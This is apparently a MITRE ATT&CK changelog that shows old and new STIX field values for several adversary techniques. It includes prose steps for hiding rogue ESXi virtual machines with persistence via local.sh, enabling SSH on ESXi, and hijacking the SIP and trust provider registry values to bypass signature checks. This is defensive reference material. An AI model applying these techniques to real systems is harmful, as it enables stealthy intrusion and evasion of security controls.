Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
Description (new):
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain, or management platforms for internal virtualization environments such as VMware vCenter.
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_system_requirements | ['Active remote service accepting connections and valid credentials'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-03-01 15:35:38.299000+00:00 | 2025-04-15 19:58:32.234000+00:00 |
description | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain.
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain, or management platforms for internal virtualization environments such as VMware vCenter.
Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) |
x_mitre_version | 1.5 | 1.6 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1018] Remote System Discovery
Current version: 3.6
Version changed from: 3.5 → 3.6
Description (old):
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
Description (new):
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-08-14 19:08:59.741000+00:00 | 2025-04-15 19:59:15.859000+00:00 |
description | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts ) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors , show arp ).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
| Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097), net view using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts ) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors , show arp ).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
external_references[2]['description'] | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020. | Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql | https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 3.5 | 3.6 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1091] Replication Through Removable Media
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_system_requirements | ['Removable media allowed, Autorun enabled or vulnerability present that allows for code execution'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-17 20:42:21.453000+00:00 | 2025-04-15 19:58:24.231000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1564.009] Hide Artifacts: Resource Forking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Notarization', 'Gatekeeper'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-05-05 05:10:23.890000+00:00 | 2025-04-16 20:37:19.185000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1578.004] Modify Cloud Compute Infrastructure: Revert Cloud Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-03-08 10:33:02.128000+00:00 | 2025-04-15 19:58:03.446000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1207] Rogue Domain Controller
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Log analysis'] | |
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-03-08 21:20:04.850000+00:00 | 2025-04-15 19:58:32.959000+00:00 |
x_mitre_version | 2.1 | 2.2 |
[T1014] Rootkit
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Anti-virus', 'File Monitoring', 'Host Intrusion Prevention Systems', 'Application Control', 'Signature-based Detection', 'System Access Controls'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-03-30 21:01:50.568000+00:00 | 2025-04-16 20:37:15.308000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1564.006] Hide Artifacts: Run Virtual Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Description (old):
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
Description (new):
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.(Citation: CyberCX Akira Ransomware) Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
In VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack.mitre.org/techniques/T1037/004)) will cause the VM to persistently restart.(Citation: vNinja Rogue VMs 2024) Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.(Citation: MITRE VMware Abuse 2024)
New Mitigations:
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-10-14 22:21:59.708000+00:00 | 2025-04-15 19:58:59.831000+00:00 |
description | Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020) | Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance.(Citation: CyberCX Akira Ransomware) Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)
In VMWare environments, adversaries may leverage the vCenter console to create new virtual machines. However, they may also create virtual machines directly on ESXi servers by running a valid `.vmx` file with the `/bin/vmx` utility. Adding this command to `/etc/rc.local.d/local.sh` (i.e., [RC Scripts](https://attack.mitre.org/techniques/T1037/004)) will cause the VM to persistently restart.(Citation: vNinja Rogue VMs 2024) Creating a VM this way prevents it from appearing in the vCenter console or in the output to the `vim-cmd vmsvc/getallvms` command on the ESXi server, thereby hiding it from typical administrative activities.(Citation: MITRE VMware Abuse 2024) |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'vNinja Rogue VMs 2024', 'description': 'Christian Mohn. (2024, November 11). Beware Of The Rogue VMs!. Retrieved March 26, 2025.', 'url': 'https://vninja.net/2024/11/11/beware-of-the-rogue-vms/'} |
external_references | | {'source_name': 'CyberCX Akira Ransomware', 'description': 'CyberCX. (2023, September 15). Weaponising VMs to bypass EDR – Akira ransomware. Retrieved April 4, 2025.', 'url': 'https://cybercx.com.au/blog/akira-ransomware/'} |
external_references | | {'source_name': 'MITRE VMware Abuse 2024', 'description': 'Lex Crumpton. (2024, May 22). Infiltrating Defenses: Abusing VMware in MITRE’s Cyber Intrusion. Retrieved March 26, 2025.', 'url': 'https://medium.com/mitre-engenuity/infiltrating-defenses-abusing-vmware-in-mitres-cyber-intrusion-4ea647b83f5b'} |
x_mitre_platforms | | ESXi |
[T1218.011] System Binary Proxy Execution: Rundll32
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-14 13:14:43.083000+00:00 | 2025-04-15 19:58:02.470000+00:00 |
x_mitre_version | 2.3 | 2.4 |
[T1134.005] Access Token Manipulation: SID-History Injection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-02-09 15:49:58.414000+00:00 | 2025-04-15 19:59:00.556000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1553.003] Subvert Trust Controls: SIP and Trust Provider Hijacking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Autoruns Analysis', 'Digital Certificate Validation', 'User Mode Signature Validation', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-05-05 04:58:58.214000+00:00 | 2025-04-15 19:58:31.965000+00:00 |
description | Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) | Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1021.002] Remote Services: SMB/Windows Admin Shares
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-28 17:34:51.250000+00:00 | 2025-04-15 19:58:29.701000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1602.001] Data from Configuration Repository: SNMP (MIB Dump)
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-22 01:54:22.812000+00:00 | 2025-04-15 19:59:19.943000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1021.004] Remote Services: SSH
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | ['Janantha Marasinghe'] |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['An SSH server is configured and running.'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-11 20:24:03.069000+00:00 | 2025-04-15 19:58:17.607000+00:00 |
description | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user. | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Sygnia Abyss Locker 2025', 'description': 'Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.', 'url': 'https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/'} |
external_references | | {'source_name': 'TrendMicro ESXI Ransomware', 'description': 'Junestherry Dela Cruz. (2022, January 24). Analysis and Impact of LockBit Ransomware’s First Linux and VMware ESXi Variant. Retrieved March 26, 2025.', 'url': 'https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html'} |
